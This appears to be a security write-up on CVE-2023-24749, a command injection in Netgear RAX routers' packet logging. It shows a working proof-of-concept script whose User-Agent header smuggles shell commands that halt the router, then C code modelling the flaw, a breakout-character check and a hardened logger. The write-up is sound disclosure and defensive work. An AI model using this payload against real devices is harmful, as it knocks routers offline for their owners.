A One-Click WAN-side RCE in Netgear RAX Routers
A breakdown of a bug SEFCOM T0 and I exploited to achieve a WAN-side RCE in some Netgear RAX routers for pwn2own 2022. The bug is a remotely accessible command injection due to bad packet logging, cataloged as CVE-2023-24749.
Quite simple, one might add.
<script>
// Override the JS-visible navigator.userAgent string. This only changes what
// scripts read from the property; the request header is set explicitly below.
Object.defineProperty(navigator, 'userAgent', {
  get: function () { return 'TEST'; }
});
// A single request whose User-Agent header carries the value that the
// router's packet logger hands to a shell without sanitising it.
const xhr = new XMLHttpRequest();
xhr.open("GET", "/");
xhr.setRequestHeader("User-Agent", '"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;"');
xhr.send();
</script>
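The root cause described above is a logger that places an attacker-controlled header inside a shell command line. The page does not show the firmware's logging code, so the following is an added illustration of the bug class and its fix, written for this page and not Netgear's code: `unsafe_build_log_cmd` models the vulnerable pattern (it only returns the command string a vulnerable daemon would pass to `system()`, and never executes it), `has_shell_breakout_char` is a check usable both for alerting on inbound requests and as a reject test in the logger, and `safe_log_header` is the hardened pattern that writes the header with `fputs` so no shell is involved. The log path `/tmp/packet.log` and the `echo` command are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Illustrative vulnerable pattern (not Netgear's code): the header value is
 * interpolated into a double-quoted shell argument. A value that contains a
 * double quote closes the argument, and everything after it is parsed as
 * further shell commands. The command is only built here, never run. */
size_t unsafe_build_log_cmd(const char *user_agent, char *out, size_t out_len) {
    int n = snprintf(out, out_len, "echo \"%s\" >> /tmp/packet.log", user_agent);
    return n < 0 ? 0 : (size_t)n;
}

/* Characters that break out of, or expand inside, a quoted sh argument:
 * double and single quotes, backtick, dollar and backslash.
 * Note that ';' and parentheses are NOT in this set: legitimate browser
 * User-Agent strings contain them ("Mozilla/5.0 (X11; Linux x86_64)"), and
 * inside an intact quoted argument they are harmless. */
int has_shell_breakout_char(const char *s) {
    return strpbrk(s, "\"'`$\\") != NULL;
}

/* Hardened pattern: write the header straight to the log file with fputs.
 * No shell parses the value, so quoting cannot be escaped. Non-printable
 * bytes (including CR/LF) are replaced so a header cannot forge or split
 * log lines, and the value is truncated to a fixed length. */
int safe_log_header(FILE *log, const char *user_agent) {
    char line[512];
    size_t i, j = 0;
    for (i = 0; user_agent[i] != '\0' && j < sizeof(line) - 2; i++) {
        unsigned char c = (unsigned char)user_agent[i];
        line[j++] = isprint(c) ? (char)c : '?';
    }
    line[j++] = '\n';
    line[j] = '\0';
    return fputs(line, log) == EOF ? -1 : 0;
}

int main(void) {
    char cmd[1024];
    /* Constructed input: the header value from the PoC above. */
    const char *payload = "\"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;\"";
    unsafe_build_log_cmd(payload, cmd, sizeof cmd);
    printf("vulnerable logger would run: %s\n", cmd);
    printf("breakout chars present: %d\n", has_shell_breakout_char(payload));
    safe_log_header(stdout, payload);
    return 0;
}
```

The check is deliberately narrow: alerting on every `;` in a User-Agent would flag nearly all browser traffic, whereas a quote, backtick, dollar sign or backslash in that header is rare in legitimate clients and is exactly what is needed to turn a quoted log argument into a second command.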